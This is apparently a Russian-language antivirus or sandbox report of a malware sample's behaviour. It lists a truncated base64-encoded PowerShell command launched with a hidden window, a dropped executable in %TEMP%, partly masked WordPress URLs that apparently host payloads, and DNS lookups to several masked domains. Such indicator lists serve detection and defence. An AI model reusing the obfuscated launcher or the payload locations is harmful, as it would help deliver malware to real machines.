Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAEgAUgBJAEgAcQBxAGsAPQAnAEcATgBLAFMASgBqAGcAYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAARQBjAFUAYABSAGkAYABUAFkAcAByAG8AYABUAG8AQwBPAGwAIgAgAD...
- %TEMP%\qkaz.exe
- http://co##ta.com/wp-admin/h33_4u_dmpy/
- http://fo###all411.net/wp-content/nlz_dqquj_s/
- DNS ASK me###nline.com
- DNS ASK xu###shuai.xyz
- DNS ASK co##ta.com
- DNS ASK of####.#orussolution.com
- DNS ASK fo###all411.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAEgAUgBJAEgAcQBxAGsAPQAnAEcATgBLAFMASgBqAGcAYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAARQBjAFUAYABSAGkAYABUAFkAcAByAG8AYABUAG8AQwBPAGwAIgAgAD...' (со скрытым окном)